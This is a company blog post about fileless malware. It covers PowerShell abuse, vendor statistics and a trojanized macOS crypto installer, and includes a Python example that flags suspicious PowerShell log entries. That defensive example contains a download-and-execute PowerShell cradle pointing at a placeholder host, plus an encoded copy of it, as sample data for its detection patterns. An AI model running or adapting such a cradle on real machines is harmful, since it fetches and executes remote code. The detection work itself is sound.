Last Updated on July 6, 2022 by Sammen Qureshi
Let’s face it, securing your data isn’t as simple as downloading antivirus software anymore. To be frank, it hasn’t been for a while now. Cybercriminals are always searching for ways to undermine your first lines of defense, and if you’re not careful, you could be just one mis-click away from a security breach.
2017 changed the game with the introduction of fileless malware – a type of attack that easily bypasses every basic security defense. According to Symantec’s 2019 Internet Security Threat Report, fileless malware is on the rise and it’s one of the biggest digital infiltration threats to companies to date.
Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they are flagged as malware. Attackers are increasingly adapting to this method of defense by employing what is called a fileless attack, also known as a zero-footprint attack or non-malware attack. These attacks are categorized as low-observable characteristic (LOC) attacks, which means they are difficult for security solutions to identify and protect against.
The Ponemon Institute estimates that fileless attacks are about 10 times more likely to succeed than file-based attacks.
According to Trend Micro’s 2021 Midyear Cybersecurity Report, in the first half of 2021 cybersecurity strongholds were surrounded by cybercriminals waiting to pounce on the slightest crack in defenses and ravage valuable assets. Fileless malware is not dependent on files being installed or executed. Just like traditional malware attacks, a device is infected after a user-initiated action (such as clicking a malicious email link or downloading a compromised software package). In some cases, by abusing PowerShell, certain fileless variants have been seen moving laterally across networks, infecting other computers on the same network.
Without being stored in a file or installed directly on a machine, infections go straight into memory and the malicious content never touches the hard drive. And because fileless malware doesn’t write anything to disk like traditional malware does, it leaves behind no apparent trace of its existence, which allows it to easily avoid detection by antivirus software that scans the file system.
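Because the script never touches disk, the place to look for the PowerShell abuse described above is the script block log rather than the file system. The following is an added example, not code from the original post: a small triage over constructed PowerShell script block log entries (Event ID 4104) that flags download-and-execute cradles, decodes -EncodedCommand blobs and rescans them. The event field layout, indicator names and sample scripts are assumptions made for this example.

```python
import base64
import re

# Heuristics for PowerShell script block text (Event ID 4104), as
# (indicator name, case-insensitive regex). Constructed for this example;
# tune and extend against your own environment's baseline.
INDICATORS = [
    ("download-cradle",
     r"(?:iex|invoke-expression)[\s\S]{0,80}?(?:downloadstring|downloaddata|invoke-webrequest|invoke-restmethod)"),
    ("in-memory-assembly-load", r"\[(?:system\.)?reflection\.assembly\]::load\("),
    ("base64-payload", r"frombase64string\("),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
]
# -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of a UTF-16LE script; return it, or '' if undecodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def scan_script(script: str) -> list[str]:
    """Return indicator names found in one script block (decoded payload included)."""
    texts, found = [script], []
    m = ENCODED_RE.search(script)
    if m:
        found.append("encoded-command")
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            texts.append(decoded)   # rescan what actually runs in memory
    for name, pattern in INDICATORS:
        if any(re.search(pattern, t, re.IGNORECASE) for t in texts):
            found.append(name)
    return found

def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map host -> indicators for 4104 events that matched at least one heuristic."""
    hits = {}
    for ev in events:
        if ev.get("id") == 4104 and (inds := scan_script(ev["script"])):
            hits[ev["host"]] = inds
    return hits

# Constructed sample events (not real logs); the cradle points at a reserved .invalid name.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01", "script": "Get-ChildItem C:\\Logs | Sort-Object LastWriteTime"},
    {"id": 4104, "host": "ws02", "script": CRADLE},
    {"id": 4104, "host": "ws03", "script": "powershell -nop -w hidden -enc "
        + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")},
]
```

Running `triage(SAMPLE_EVENTS)` flags ws02 and ws03 and leaves the benign ws01 entry alone; the same heuristics apply to 4104 events exported from a SIEM once mapped to the `id`/`host`/`script` fields.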
According to the 2020 SonicWall Cyber Threat Report, cybercriminals are using new code obfuscation, sandbox detection and bypass techniques. This has resulted in a multitude of variants and the development of newer and more sophisticated exploit kits that use fileless attacks instead of writing traditional payloads to disk. While malware decreased 6% globally, SonicWall observed that most new threats masked their exploits within today’s most trusted file types. In fact, Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.
In December 2019, a fileless macOS malware was discovered being distributed as a piece of crypto trading software called UnionCryptoTrader.dmg. Attackers used a trojanized version of a legitimate crypto trading application installer, which was circulated from a crypto trading website called JMTTrading that offered a “smart cryptocurrency arbitrage trading platform.” At the time of writing this, the security research service VirusTotal shows that only about half of macOS anti-virus apps can detect the malware – almost a year after it was discovered!
Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. The best way to harden those systems is to implement a multi-layered defense (defense in depth). By actively monitoring and accounting for the entire threat lifecycle, you give yourself the best possible chance against malicious attacks.
What are the components of a good defense in depth methodology? The key components involve software, hardware and business operation procedures. At a bare minimum, you will want:
Not all organizations have the resources to build and maintain these technologies and processes in-house. If your business has gaps in the areas of expertise to secure its infrastructure, consider a ColoHouse Security and Compliance Consultation with our team to ensure the infrastructure your business relies on is protected. Contact us today to learn more.